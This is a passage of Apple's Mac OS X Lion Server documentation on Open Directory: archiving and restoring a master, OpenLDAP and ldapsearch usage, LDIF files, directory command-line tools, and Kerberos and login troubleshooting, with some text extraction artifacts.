directory systems. For more information about configuring acces s to a directory s ervice, see Directory Utility Help.
Archive an Open Directory master

You can us e Server Admin to archive a copy of an Open Directory masters directory and authentication data. You can archive a copy of the data while the Open Directory master is in service. The following files are archived: LDAP directory databas e and configuration files Open Directory password server database Kerberos databas e and configuration files Local directory domain and s hadow pass word database If you have a reliable archive of an Open Directory master, you effectively have an archive of all its replicas . If a replica develops a problem, you can change its Open Directory role to s tandalone server and then set up the server as if it were a new server, with a new host name, and set it up as a replica of the same master as before. Important: Carefully s afeguard the archive media that contains a copy of the Open Directory pas sword database, the Kerberos database, and the Kerberos keytab file. The archive contains pas swords of all users who have an Open Directory pas sword, both in the s hared LDAP directory domain and in the local directory domain. Your s ecurity precautions for the archive media should be as stringent as for the Open Directory master s erver.
1. Open Server Admin and connect to Open Directory master server. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Open Directory. 4. Click Archive. 5. In the Archive in field, enter the path to the folder where you want the Open Directory data archived, then click the Archive button. You can enter the folder path or click Choose to s elect it. 6. Enter a name and pas sword to use in encrypting the archive, then click OK.
Restore an Open Directory master

You can us e Server Admin or the slapconfig command-line tool to restore an Open Directory masters directory and authentication data from an archive. If you use Server Admin, you can res tore to a server that is an Open Directory mas ter. The following files are restored by merging the archive with the exis ting mas ter: LDAP directory databas e and configuration files Open Directory password server database Kerberos databas e and configuration files If conflicts are encountered during the merge operation, the existing record takes precedence over the one in the archive. The archive record is ignored. Conflicts are recorded in the s lapconfig log file (/Library/Logs /s lapconfig.log), which you can view using Server Admin. See View Open Directory status and logs. Instead of restoring an Open Directory mas ter from an archive, you might get better res ults by promoting a replica to be the master. The replica might have more recent directory and authentication data than the archive. After restoring an Open Directory master from an archive, you must recreate your Open Directory replicas. Important: Dont restore an archive as a means of porting directory and authentication data from one sys tem to another. Instead,
export from the source directory and import to the target directory. For more information about exporting and importing directory data, see Workgroup Manager Help.
1. Open Server Admin and connect to the Open Directory master server. The target server mus t have the same Kerberos realm name as the mas ter that the archive was created from. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Open Directory. 4. Click Archive. 5. In the Restore from field, enter the path to the Open Directory archive file, then click the Res tore button. You can enter the path or click Choose to select the archive file. 6. Enter the pas sword that was used to encrypt the archive when it was created, then click OK. 7. When the res tore operation finishes, check the slapconfig log for information about conflicts or other events that occurred while restoring. 8. Convert existing Open Directory replica servers to Open Directory standalone servers and then make them replicas of the new master. For more information, see Set up a s tandalone directory service and Set up an Open Directory replica or relay.
Use slapconfig to restore an Open Directory master

Instead of restoring to a s erver that is an Open Directory master, you can restore to a standalone server. This server becomes an Open Directory mas ter with directory and authentication data from the archive. The restored data includes the LDAP, Kerberos, and pass word s erver files lis ted above, plus the local directory domain and ass ociated s hadow pass word files. In addition, slapconfig preserves the local user account you us ed in the login window. After restoring, the mas ter contains the user account records from the archive plus the account you used in the login window. If the archive contains a user account that conflicts with the account you us ed in the login window, the account from the archive is ignored. WARNING: If you res tore a standalone s erver, the existing directory records and authentication data are not retained, except for the user account you us ed in the login window.
To replace the directory and authentication data on a standalone s erver with data from an Open Directory archive, enter: $ sudo slapconfig -restoredb archive-path Replace archive-path with the path to the archive file.
For more information about slapconfig, s ee its man page.
Manage OpenLDAP
To provide directory services for mixed-platform environments , Open Directory uses OpenLDAP, the open source implementation of LDAP. A common language for directory acces s lets you consolidate information from different platforms and define a single name space for network resources. Whether you have Mac, Windows, or Linux computers on your network, you can set up and manage a single directory, eliminating the need to maintain a separate directory or s eparate us er records for each platform.
Configure OpenLDAP The OpenLDAP server daemon is slapd, in /usr/libexec/. The primary configuration files for OpenLDAP are located in /etc/openldap/. There you find the slapd.conf and slapd_macos xs erver.conf files, which contains configuration information. slapd reads and writes configuration information to the config backend database /etc/openldap/s lapd.d, which is another database, by the s earch base cn=config. The old /etc/openldap/slapd.conf and slapd_macosxserver.conf files are created by slapd but are not read by slapd and should only be used for a reference to the one-to-one corresponding configurations in the olcGlobal object class under the config entry. The attributes and object classes have a prefix of olc. The directory adminis trator can modify configuration settings such as ACL or schema settings by using Workgroup Manager with the inspector mode turned on or using dscl. Also, some sizelimit, timelimit, and SSL s ettings s hould only be set using Server Admin. Use slapd and slurpd Daemons to configure LDAP To configure the slapd and slurpd LDAP daemons and related search policies, use the slapconfig tool. For more information, see the slapconfig man page. Standard distribution tools Two types of tools come with OpenLDAP: Tools that operate directly on the LDAP databasesthese tools begin with slap. Tools that go through the LDAP protocolthese tools begin with ldap. You mus t run the slap tools on the computer hosting the LDAP databas e. When using the slap tools, shut down the LDAP service. If you dont, your database can get out of sync. These tools are included in the standard OpenLDAP dis tribution:
Tool /usr/bin/ldapadd /usr/bin/ldapcompare /usr/bin/ldapdelete /usr/bin/ldapmodify /usr/bin/ldapmodrdn /usr/bin/ldappasswd Used to Add entries to the LDAP directory. Compare a directory entrys actual attributes with known attributes. Delete entries from the LDAP directory. Change an entrys attributes. Change an entrys relative distinguished name (RDN). Set the password for an LDAP user. Apple recommends using information, see the /usr/bin/ldapsearch /usr/bin/ldapwhoami /usr/sbin/slapadd /usr/sbin/slapcat /usr/sbin/slapindex /usr/sbin/slappasswd
passwd instead of ldappasswd. For more
passwd man page.
Search the LDAP directory. Obtain the primary authorization identity associated with a user. Add entries to the LDAP directory. Export LDAP Directory Interchange Format files. Regenerate directory indexes. Generate user password hashes
LDAP idle rebinding options

The following LDAPv3 plug-in parameters are us ed in the file /Library/Preferences/DirectoryService/DSLDAPv3PlugInConfig.plist. Delay rebind This parameter specifies how long the LDAP plug-in waits before attempting to reconnect to a s erver that fails to res pond. You can
increas e this value to prevent continuous reconnection attempts. <key>Delay Rebind Try in seconds </key> <integer>n</integer> You can find this parameter in the DSLDAPv3PlugInConfig.plist file near <key>OpenClose Timeout in seconds</key>. If not, add it there. Idle timeout This parameter specifies how long the LDAP plug-in s its idle before disconnecting from the server. You can adjus t this value to reduce overloading the servers connections from remote clients. <key>Idle Timeout in minutes</key> <integer>n</integer> If this parameter does nt exis t in the DSLDAPv3PlugInConfig.plist file, add it near <key>OpenClose Timeout in seconds</key>
Search the LDAP server

The ldapsearch tool connects to an LDAP server, authenticates, finds entries, and returns attributes of the entries found. To query the LDAP s erver for a user's information:
Enter the following command, replacing the example search bas e (cn=us ers, dc=example, dc=com) with an actual search base: $ ldapsearch -H ldap://127.0.0.1 -b cn=users,dc=example,dc=com By default, ldapsearch tries to connect to the LDAP s erver using the Simple Authentication and Security Layer (SASL) method. If the server doesnt s upport this method, you s ee this error message: ldap_sasl_interactive_bind_s: No such attribute (16) To avoid this error, include the -x option when you enter the command. For example: $ ldapsearch -h 192.168.100.1 -b "dc=example,dc=com" -x The -x option forces ldapsearch to us e simple authentication instead of SASL. The -x option also works on other LDAP tools . You can also us e ldapsearch for debugging issues with LDAP, independent of the directory services LDAPv3 plug-in. For example, you can read the root directory server entry (DSE) like the following (where -LLL omits some output, -x means no SASL, -h specifies the hostname, -b specifies the search bas e and -s specifies the type of search): $ ldapsearch -LLL -x -h ldap.psu.edu -b "" -s base dn: namingcontexts: CN=SCHEMA namingcontexts: CN=LOCALHOST namingcontexts: CN=PWDPOLICY namingcontexts: CN=IBMPOLICIES namingcontexts: DC=PSU,DC=EDU subschemasubentry: cn=schema supportedextension: 1.3.18.0.2.12.1 supportedextension: 1.3.18.0.2.12.3 supportedextension: 1.3.18.0.2.12.5 supportedextension: 1.3.18.0.2.12.6 supportedextension: 1.3.18.0.2.12.15 supportedextension: 1.3.18.0.2.12.16
supportedextension: 1.3.18.0.2.12.17 supportedextension: 1.3.18.0.2.12.19 supportedextension: 1.3.18.0.2.12.44 supportedextension: 1.3.18.0.2.12.24 supportedextension: 1.3.18.0.2.12.22 supportedextension: 1.3.18.0.2.12.20 supportedextension: 1.3.18.0.2.12.28 supportedextension: 1.3.18.0.2.12.30 supportedextension: 1.3.18.0.2.12.26 supportedextension: 1.3.6.1.4.1.1466.20037 supportedextension: 1.3.18.0.2.12.35 supportedextension: 1.3.18.0.2.12.40 supportedextension: 1.3.18.0.2.12.46 supportedextension: 1.3.18.0.2.12.37 supportedcontrol: 2.16.840.1.113730.3.4.2 supportedcontrol: 1.3.18.0.2.10.5 supportedcontrol: 1.2.840.113556.1.4.473 supportedcontrol: 1.2.840.113556.1.4.319 supportedcontrol: 1.3.6.1.4.1.42.2.27.8.5.1 supportedcontrol: 1.2.840.113556.1.4.805 supportedcontrol: 2.16.840.1.113730.3.4.18 supportedcontrol: 1.3.18.0.2.10.15 supportedcontrol: 1.3.18.0.2.10.18 security: none port: 389 supportedsaslmechanisms: CRAM-MD5 supportedsaslmechanisms: DIGEST-MD5 supportedldapversion: 2 supportedldapversion: 3 ibmdirectoryversion: 5.2 ibm-ldapservicename: tr17n01.aset.psu.edu ibm-serverId: 0f876740-64d2-102b-8f0b-8ab9d7eaa702 ibm-supportedacimechanisms: 1.3.18.0.2.26.3 ibm-supportedacimechanisms: 1.3.18.0.2.26.4 ibm-supportedacimechanisms: 1.3.18.0.2.26.2 vendorname: International Business Machines (IBM) vendorversion: 5.2 ibm-sslciphers: N/A ibm-slapdisconfigurationmode: FALSE ibm-slapdSizeLimit: 200 ibm-slapdTimeLimit: 900 ibm-slapdDerefAliases: always ibm-supportedAuditVersion: 2 ibm-sasldigestrealmname: tr17n01.aset.psu.edu If the server is an OpenLDAP server, specify + for operational attributes or specify the attributes of interes t: $ ldapsearch -LLL -x -h xtra.apple.com -b "" -s base +
dn: structuralObjectClass: OpenLDAProotDSE namingContexts: dc=apple,dc=com supportedControl: 2.16.840.1.113730.3.4.18 supportedControl: 2.16.840.1.113730.3.4.2 supportedControl: 1.3.6.1.4.1.4203.1.10.1 supportedControl: 1.2.840.113556.1.4.1413 supportedControl: 1.2.840.113556.1.4.1339 supportedControl: 1.2.840.113556.1.4.319 supportedControl: 1.2.826.0.1.334810.2.3 supportedExtension: 1.3.6.1.4.1.1466.20037 supportedExtension: 1.3.6.1.4.1.4203.1.11.1 supportedExtension: 1.3.6.1.4.1.4203.1.11.3 supportedFeatures: 1.3.6.1.4.1.4203.1.5.1 supportedFeatures: 1.3.6.1.4.1.4203.1.5.2 supportedFeatures: 1.3.6.1.4.1.4203.1.5.3 supportedFeatures: 1.3.6.1.4.1.4203.1.5.4 supportedFeatures: 1.3.6.1.4.1.4203.1.5.5 supportedLDAPVersion: 3 supportedSASLMechanisms: CRAM-MD5 supportedSASLMechanisms: GSSAPI subschemaSubentry: cn=Subschema Usually the namingContexts value is the first thing you want to determine: $ ldapsearch -LLL -x -h xtra.apple.com -b "" -s base namingContexts dn: namingContexts: dc=apple,dc=com After you determine the value, search for a record with a command, like this: $ ldapsearch -LLL -x -h xtra.apple.com -b "dc=apple,dc=com" uid=ajohnson uid cn dn: uid=ajohnson,cn=users,dc=apple,dc=com uid: ajohnson cn: Anne Johnson
Use LDIF files

Lightweight Directory Interchange Format (LDIF) is a file format used to represent LDAP entries in text form. LDAP tools such as ldappadd, ldapmodify, and ldapsearch read and write LDIF files. Here is an example of an LDIF file containing three entries. Multiple entries in an LDIF file are separated by blank lines. dn: cn=Mei Chen,dc=example,dc=com cn: Mei Chen cn: M Chen objectclass: person description: file:///tmp/babs sn: Chen dn: cn=Anne Johnson,dc=example,dc=com
cn: Anne Johnsone cn: A Johnson objectclass: person sn: Johnson dn: cn=Tom Clark,dc=example,dc=com cn: Tom Clark cn: T Clark objectclass: person sn: Clark WARNING: LDAP tools can modify or add entries to the LDAP directory. Changing raw data in a directory can have unexpected and undesirable consequences. You could inadvertently incapacitate users or computers , or you could unintentionally authorize users to access more resources.
To load an LDIF file into the LDAP directory: $ ldapadd -H ldap://appleserver.example.com -f myusers.ldif Replace appleserver.example.com with the location of the LDAP directory and myusers.ldif with the name of your LDIF file.
Kerberize services with an Active Directory server

If your computer is connected to an Active Directory s erver, you can use the dsconfigad command to Kerberize your services with the Active Directory Kerberos realm. This is commonly used when configuring a magic triangle with an Active Directory server and a Open Directory server.
Enter the following command to Kerberize your s ervices with an Active Directory s erver: $ sudo dsconfigad -enablesso
Manage directory service domains

Use dscl, a general-purpose tool, for operating on directory domains. You can create, read, and manage directory data. If invoked without commands, dscl runs in an interactive mode, reading commands from s tandard input. The following example shows bas ic dscl tool us es:
To verify that you can access an LDAPv3 directory: $ dscl localhost > cd /LDAPv3/directory.example.com/Users > ls You should see a list of the servers network user accounts .
For more information, s ee the dscl man page.
Manipulate a single named group record

Use dseditgroup to manipulate a single named group record on the default local directory domain or on the specified directory domain. The following examples s how uses for dseditgroup. To manipulate a group record:
To view the attributes of a group in the local directory domain: $ dseditgroup -o read groupname To create a group in a domain: $ dseditgroup -o create -n /LDAPv3/ldap.example.com -u diradmin_name -P diradmin_password -r "Gr To create a Windows group in a domain and set the domain group relative identifier (RID): $ dseditgroup -o create -n /LDAPv3/ldap.example.com -u diradmin_name -P diradmin_password -r "Gr $ dscl -u diradmin_name -P diradmin_password /LDAPv3/ldap.example.com -create /Groups/groupname To delete a group from a domain: $ dseditgroup -o delete -n /LDAPv3/ldap.example.com -u diradmin_name -P diradmin_password groupn
Parameter
Description Name of the directory administrator Password of the directory administrator Real name to add or replace Comment or add or replace T ime-to-live, in seconds, to add or replace Keyword to add Group name
diradmin_name diradmin_password Group Name comment 1234 some keyword groupname
For more information, s ee the dseditgroup man page.
Add or remove LDAP server configurations

Use dsconfigldap to add or remove LDAP server configurations in directory services.
To add an LDAP server: $ dsconfigldap -v -a myldap.example.com To remove an LDAP server: $ dsconfigldap -v -r myldap.example.com
Configure the Active Directory connector

Use dsconfigad to configure the Active Directory connector from the command-line. dsconfigad has the same functionality for configuring the Active Directory connector as Directory Utility.
To add a computer to a directory: $ dsconfigad -a computerid -u "administrator" -ou "CN=Computers,OU=Engineering,DC=ads,DC=demo,DC=
Parameter
Description
computerid administrator
T he computer ID to add to the domain. T he user name of a network account that has administrator privileges.
CN=Computers,OU=Engineering,DC=ads,DC=demo,DC=com T he LDAP domain name of the container used for adding the computer.
If this is not specified, it defaults to the container.
domain
T he fully-qualified domain name of the domain used when adding the computer to the directory.
For more information, s ee the dsconfigad man page.
Solv e Open Directory problems
If Kerberos is stopped on an Open Directory master or replica

An Open Directory master requires properly configured DNS so it can provide single sign-on Kerberos authentication.
1. Make sure DNS service is configured to resolve fully qualified DNS names and provide corresponding revers e lookups. DNS mus t resolve fully qualified DNS names and provide reverse lookups for the master s erver, replica s ervers, and other servers that are members of the Kerberos realm. To perform a DNS lookup of a servers DNS name and a reverse lookup of the s ervers IP address, you can use the Lookup pane of Network Utility (in /Applications/Utilities). For more information about setting up DNS service, see Server Admin Help. 2. Make sure the Open Directory mas ter servers host name is the correct fully qualified DNS name, not the servers local hostname. For example, the host name might be ods .example.com but should not be ods.local. You can s ee the hos t name by opening Terminal and entering hostname. If the Open Directory s ervers hos t name isnt its fully qualified DNS name, temporarily clear the lis t of DNS servers and click Apply in the Open Directory servers Network preferences. Then re-enter DNS server IP addres ses , starting with the primary DNS server that resolves the Open Directory servers name, and click Apply in Network Preferences. If the Open Directory s ervers hos t name s till isnt its fully qualified DNS name, res tart the s erver. 3. Make sure the Open Directory mas ter servers Network preferences are configured to use the DNS server that resolves the servers name. If the Open Directory master server provides its own DNS service, the s ervers Network preferences must be configured to us e itself as a DNS server. 4. After confirming the correct DNS configuration for the server, start Kerberos . See Start Kerberos after s etting up an Open Directory mas ter.
If you can't create an Open Directory replica

If you try to create two replicas simultaneously, one attempt succeeds and the other fails. A s ubsequent attempt to establish the second replica should succeed. If you s till cant create the s econd replica, go to folder /var/run/, look for the file slapconfig.lock, and remove it if it exists. Also, view the /Library/Logs /s lapconfig.log log file. Alternatively, res tart the server.
If you can't connect a replica to your relay

Make sure your replica has not reached its capacity of 32 replicas . Also make sure that you are not connecting to a s econd tier
replica instead of a first tier relay.
If you can't join an Open Directory replica to an Open Directory that's a subordinate of an Active Directory server
Before you try to turn the server into a replica of the subordinate Open Directory server, make s ure you connect the server to the same Active Directory server as the Open Directory master server you are attempting to connect to. Your replicas must have access to the Active Directory server for Kerberos to work.
If a delay occurs during startup

If a Mac experiences a startup delay while a message about LDAP or directory s ervices appears above the progress bar, the computer could be trying to access an LDAP directory that is not available on your network. Consider the following: A pause during startup is normal if a portable computer is not connected to the network that the LDAP s erver is connected to. Use Directory Services under Login Option in Account preferences to make sure the local directory domain and LDAP configurations are correct. Use the Network pane of Sys tem Preferences to make sure the computers network location and other network settings are correct. Inspect the phys ical network connection for faults.
If you can't change a user's Open Directory password

To change the pass word of a user whose password type is Open Directory, you must be an administrator of the directory domain where the us ers record resides. In addition, your us er account must have a pass word type of Open Directory. The user account specified when the Open Directory master was s et up (using Server Ass is tant or the Open Directory s ervice settings in Server Admin) normally has an Open Directory pass word. You can use this account to set up other user accounts as directory domain adminis trators with Open Directory pass words. If all else fails, enable the root user account and use it to set up a user account as a directory administrator with an Open Directory pas sword. For information on enabling the root account, s ee Directory Utility Help (located in the Server app > Tool > Directory Utility.)
If a user can't access some services

If a user can access s ome services that require authentication but not others, temporarily change the users pass word to a simple sequence of characters , such as pas sword. If this solves the problem, the us ers previous password contained characters that were not recognized by all services. For example, s ome services accept spaces in passwords while others dont.
If users can't authenticate for VPN service

Users whose accounts are s tored on a server with Mac OS X Server v10.2 cant authenticate to VPN s ervice provided by Mac OS X Server v10.3-10.6 or Lion Server. VPN service requires the MS-CHAPv2 authentication method, which is nt supported in Mac OS X Server v10.2.
To enable affected us ers to log in, move their user accounts to a server with Mac OS X Server v10.310.6 or Lion Server. Alternatively, if pos sible, upgrade the older server to Lion Server or later.
If you can't change a user's password type to Open Directory

To change a users pas sword type to Open Directory authentication, you must be an administrator of the directory domain where the users record resides . In addition, your us er account must be configured for Open Directory authentication. The user account specified when the Open Directory master was s et up (using Server Ass is tant or the Open Directory s ervice settings in Server Admin) has an Open Directory pas sword. You can use this account to set up other user accounts as directory domain adminis trators with Open Directory pass words.
If users can't log in with accounts in a shared directory domain

Users cant log in using accounts in a s hared directory domain if the server hos ting the directory isnt access ible. A server can become inaccess ible due to a problem with the network, the server software, or the s erver hardware. Problems with the s erver hardware or software affect us ers trying to log in to a Mac computer. Network problems can affect some users but not others , depending on where the network problem is. Users with mobile user accounts can still log in to a Mac they used previous ly, and users affected by these problems can log in by using a local user account defined on the computer, such as the user account created during setup after installing Mac OS X Lion.
If you can't log in as an Active Directory user

After configuring a connection to an Active Directory domain in the Service pane of Directory Utility (located in Users & Groups preferences) and adding it to a custom search policy in the Authentication pane, wait 10 or 15 seconds for the change to take effect. Attempts to log in immediately with an Active Directory account do not succeed.
If users can't authenticate using single sign-on Kerberos

When a us er or service that uses Kerberos experiences authentication failures, try these remedies: Kerberos authentication is bas ed on encrypted time stamps. If theres more than a 5-minute difference between the KDC, client, and service computers, authentication may fail. Make s ure the clocks for all computers are synchronized us ing the Network Time Protocol (NTP) service of a Lion server or another network time server. For information about the NTP service, see NTP. Make s ure Kerberos is running on the Open Directory master and replicas . See If Kerberos is stopped on an Open Directory master or replica. If a Kerberos s erver used for pass word validation is not available, reset the users password to use a s erver that is available. Make s ure the server providing the Kerberized service has access to the Kerberos servers directory domain, and make sure this directory domain contains the accounts for users who are trying to authenticate using Kerberos . For information about configuring access to directory domains, see Directory server connections . For an Open Directory s ervers Kerberos realm, make sure the client computer is configured to acces s the Open Directory servers LDAP directory using the correct search bas e s uffix. The clients LDAPv3 search base suffix setting must match the LDAP directorys s earch base setting. The clients LDAPv3 search bas e suffix can be blank if it gets its LDAP mappings from the server. If so, the client uses the LDAP directorys default search base suffix. To check the clients search bas e suffix s etting, open Directory Utility (located in Us ers & Groups preferences), show the list of LDAPv3 configurations , and choose the item from the LDAP Mappings pop-up menu thats already s elected in the menu.
For more information, s ee Change the connection settings for an LDAP or Open Directory server. To check the LDAP directorys search base s etting, open Server Admin and look in the Protocols pane of the Settings pane for Open Directory s ervice. For information that can help you s olve problems , see the KDC log. Also s ee View Open Directory s tatus and logs . If Kerberos was not running when user records were created, imported, or updated from an earlier Mac OS X version, they might not be enabled for Kerberos authentication: A record is nt enabled for Kerberos if its authentication authority attribute lacks the ;Kerberosv5; value. Use the Directory Editor in Directory Utility to see the values of a us er records authentication authority attribute. For more information, see Directory Utility Help. Enable Kerberos for a us er record by changing its pas sword type. Set the pas sword type to Shadow Pas sword, then set it to Open Directory. For more information, see Change the pas sword type to shadow password and Change the password type to Open Directory. If users cant authenticate us ing single sign-on or Kerberos for services provided by a server that is joined to an Open Directory masters Kerberos realm, the servers computer record might be incorrectly configured in the Open Directory masters LDAP directory. The servers name in the computer group account mus t be the s ervers fully qualified DNS name, not just the servers hos t name. For example, the name could be server2.example.com but not jus t server2.
1. Delete the server from the computer group account in the LDAP directory. For more information about this and the next step, see Workgroup Manager Help. 2. Add the server to the computer group again. 3. Delegate authority again for joining the s erver to the Open Directory masters Kerberos realm. For more information, see Delegate authority to join an Open Directory Kerberos realm. 4. Rejoin the server to the Open Directory Kerberos realm. For more information, see Join a server to a Kerberos realm.
If you can't join a server to an Open Directory Kerberos realm

If a user with delegated Kerberos authority cant join a server to an Open Directory mas ters Kerberos realm, the s ervers computer record might be incorrectly configured in the Open Directory masters LDAP directory. The s ervers addres s in the computer group account mus t be the s ervers primary Ethernet address. The primary Ethernet address is the Ethernet ID of the firs t Ethernet port in the list of network port configurations shown in the servers Network preferences pane.
1. Delete the server from the computer group account in the LDAP directory For more information about this and the next step, see Workgroup Manager Help. 2. Add the server to the computer group again. 3. Delegate authority again for joining the s erver to the Open Directory masters Kerberos realm. Skip this step if you can use a Kerberos administrator account (LDAP directory adminis trator account) to rejoin the server to the Kerberos realm. For more information, see Delegate authority to join an Open Directory Kerberos realm. 4. Rejoin the server to the Open Directory Kerberos realm. For more information, see Join a server to a Kerberos realm.
Command-line parameters for Open Directory
Command-Line parameters for Open Directory
Open Directory service settings To change settings for the Open Directory s ervice, use the following parameters with the serveradmin tool. Be sure to add dirserv: to the beginning of any parameter you use.
Parameter replicationUnits replicaLastUpdate LDAPSettings:LDAPDataBasePath replicationPeriod LDAPSettings:LDAPSearchBase passwordOptionsString Description Default = "days" Default = "" Default = "" Default = 4 Default = "" Default =
"usingHistory=0 usingExpirationDate=0
usingHardExpirationDate=0 requiresAlpha=0 requiresNumeric=0 expirationDateGMT=12/31/69 hardExpireDateGMT=12/31/69 maxMinutesUntilChangePassword=0 maxMinutesUntilDisabled=0 maxMinutesOfNonUse=0 maxFailedLoginAttempts=0 minChars=0 maxChars=0 passwordCannotBeName=0"
LDAPSettings:LDAPSSLCertificatePath masterServer LDAPServerType replicationWhen LDAPSettings:useSSL LDAPDefaultPrefix LDAPSettings:LDAPTimeoutUnits LDAPSettings:LDAPServerBackend Default = "" Default = "" Default = "standalone" Default = "periodic" Default = "YES" Default = "dc=domain,dc=com" Default = "minutes" Default = "BerkeleyDB"
OpenLDAP standard distribution tools Two types of tools come with OpenLDAP: Tools that operate directly on the LDAP databasesthese tools begin with slap. Tools that go through the LDAP protocolthese tools begin with ldap. You mus t run the slap tools on the computer hosting the LDAP databas e. When using slap tools, shut down the LDAP service. If you dont, your database can get out of sync. These tools are included in the standard OpenLDAP dis tribution.
Tool /usr/bin/ldapadd /usr/bin/ldapcompare /usr/bin/ldapdelete /usr/bin/ldapmodify /usr/bin/ldapmodrdn /usr/bin/ldappasswd Used to Add entries to the LDAP directory. Compare a directory entrys actual attributes with known attributes Delete entries from the LDAP directory. Change an entrys attributes. Change an entrys relative distinguished name (RDN). Set the password for an LDAP user. Apple recommends using instead of page.
passwd
ldappasswd. For more information, see the passwd man
/usr/bin/ldapsearch /usr/bin/ldapwhoami /usr/sbin/slapadd /usr/sbin/slapcat /usr/sbin/slapindex /usr/sbin/slappasswd
Search the LDAP directory. Obtain the primary authorization identity associated with a user. Add entries to the LDAP directory. Export LDAP Directory Interchange Format files. Regenerate directory indexes. Generate user password hashes.
Directory Utility
Get started
About Directory Utility

Directory Utility is us ed for configuring advanced connections to directory s ervers. For basic connections to Open Directory and Active Directory domains, use the Network Accounts Server options in the Login Options sections of Us ers & Groups preferences. For instructions, click the Help button for the Login Options section of Us er & Groups preferences. You can customize the advanced settings of Directory Utility to work with your computer and software applications. You can use Directory Utility (located in Us ers & Groups preferences) to set up and manage how a computer with Mac OS X Lion or a server with Mac OS X Lion server acces ses directory domains. You can us e the advanced features of Directory Utility to configure NFS mount records, services, s earch policies , and remote computers . The following are advanced features of Directory Utility: Connect: configures a client computer or server remotely. Services: configures directory servers that users can access. Search Policy: configures where the computer searches for user authentication and contact information. Directory Editor: configures records and attributes in a directory domain or local directory. Accessing LDAP directories You can configure a computer with Mac OS X or a server with Mac OS X Server to acces s specific LDAP directories , including the LDAP directory of a Mac OS X Server Open Directory master. Accessing an Active Directory domain You can configure a computer with Mac OS X or a server with Mac OS X Server to acces s an Active Directory domain on a Windows 2000 or Windows 2003 or later s erver. To learn more, click the topics below. Accessing an NIS domain You can create a configuration that s pecifies how Mac OS X accesses an NIS domain. Using BSD configuration files You can us e Open Directory to retrieve adminis trative data from BSD configuration files s uch as /etc/mas ter.passwd, also known as BSD flat files. View and edit directory data You can view or edit raw directory data by using Directory Editor in Directory Utility. When using Directory Editor you can see directory data and edit directory data. For example, you can us e Directory Editor to change a users first short name.
Directory Utility
Get started
Directory server connections

You can us e Users & Groups preferences to connect computers to directory s ervers. You can view lis ts of directory servers your computer is connected to by clicking Edit in the Login Options pane of Users & Groups preferences . Your Mac computer accesses the servers in the lis t for us er information and other administrative data stored in the directory domain of directory servers .
When you add or delete a s erver in the Directory Servers list, the entries ass ociated with that directory s erver are added or deleted from the Services, Authentication, and Contacts list. However, if you remove the ass ociated entries in the Services, Authentication, and Contacts lis t, the directory server is not removed from the Directory Servers list. For more information about using Users & Groups preferences to add directory servers, search Mac Help for network account server. A Mac computer can connect to an Open Directory, Active Directory, or LDAP directory server. If you dont know which server to connect to, ask your network administrator. Important: If your computer name contains a hyphen, you might not be able to join or bind to a directory domain such as LDAP or Active Directory. To es tablis h binding, use a computer name that does not contain a hyphen.
Directory Utility
Get started
Configure access to an Open Directory server

When adding an Open Directory server, you must know the server name or IP addres s and whether the s erver uses Secure Sockets Layer (SSL). Important: If your computer name contains a hyphen, you might not be able to join or bind to a Directory Domain s uch as LDAP or Open Directory. To es tablis h binding, use a computer name that does not contain a hyphen.
1. Open Sys tem Preferences and click Users & Groups . 2. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 3. Click Login Options, then click Join or Edit. If you see an Edit button, your computer has at leas t one connection to a directory server. 4. Click Open Directory Utility. 5. If the lock icon is locked, unlock it by clicking it and entering the name and password of an administrator. 6. Click Services. 7. In the list of s ervices , select LDAPv3 and click the Edit button (/). 8. Click New, then click Edit. By default, the new directory connection is enabled. For more information about enabling or disabling a directory connection, see Enable or disable directory s ervice. 9. Enter a name in the Configuration Name field. 10. Enter the server name or IP addres s of the Open Directory server in the Server Name or IP Address field. 11. Select Encrypt using SSL if you want Open Directory to use Secure Sockets Layer (SSL) for connections. Before you select this, ask your Open Directory administrator to determine if SSL is needed. If Directory Utility cant contact the Open Directory server, you might need to adjust your configuration access settings. For more information, see Change the connection settings for an LDAP or Open Directory s erver. 12. Click Search & Mappings. 13. From the Access this LDAPv3 server us ing pop-up menu, choos e Open Directory and enter a s earch base. You must enter a s earch base suffix or the computer cant find information in the Open Directory. Typically, the search base suffix is derived from the s ervers DNS host name. For example, the s earch base suffix could be dc=ods,dc=example,dc=com for a server whose DNS host name is ods.example.com. For more information about setting up searches and mappings for an LDAP server, see Configure LDAP Searches & Mappings . 14. If the directory server s upports trusted binding, click Bind and enter the name of the computer and the name and password of a directory administrator. The binding might be optional. Trusted binding is mutual: each time the computer connects to the LDAP directory, they authenticate each other. If trusted
binding is set up or the LDAP directory does nt support trusted binding, the Bind button does not appear. Make sure you supplied the correct computer name. If you see an alert saying that a computer record exists, try again us ing a different computer name, or click Overwrite to replace the exis ting computer record. The existing computer record might be abandoned, or it might belong to another computer. If you replace an existing computer record, notify the LDAP directory administrator in case replacing the record disables another computer. In this case, the LDAP directory administrator mus t give the dis abled computer a different name and add it back to the computer group it belonged to. For more information, see Set up trusted binding for an LDAP directory. 15. Click Security. If Open Directory requires authentication to connect, select Use authentication when connecting and enter the distinguished name and password of a user account in the directory. An authentication connection is not mutual: the LDAP s erver authenticates the client but the client doesnt authenticate the server. The distinguished name can specify any user account that has permission to see data in the directory. For example, a user account whose s hort name is dirauth on an LDAP server and whos e addres s is ods.example.com would have the distinguis hed name uid=dirauth,cn=users ,dc=ods,dc=example,dc=com. For more information, see Change the s ecurity policy for an LDAP connection. Important: If the distinguished name or pas sword are incorrect, you can log in to the computer using a user account from the LDAP directory. 16. Click OK to finish creating the Open Directory connection. 17. Click OK to finish configuring LDAPv3 options. If you want the computer to access the LDAP directory you created a configuration for, add the directory to a custom search policy in the Authentication pane and the Contacts pane of Search Policy in Directory Utility, then make sure it is enabled in Services. For information about creating search policies, see Define s earch policies . For information about enabling a directory service, see Enable or disable directory service. Important: If you change the IP address and computer name of your Mac server using changeip while you are connected to a directory server, you must dis connect and reconnect to the directory server to update the directory with the new computer name and IP address . If you do not disconnect and reconnect to the directory server, the directory does not update and continues to use the old computer name and IP addres s.
Directory Utility
Get started
Set up Directory Utility on a remote server

You can us e Directory Utility on your computer to remotely set up and manage how a Mac server accesses directory services.
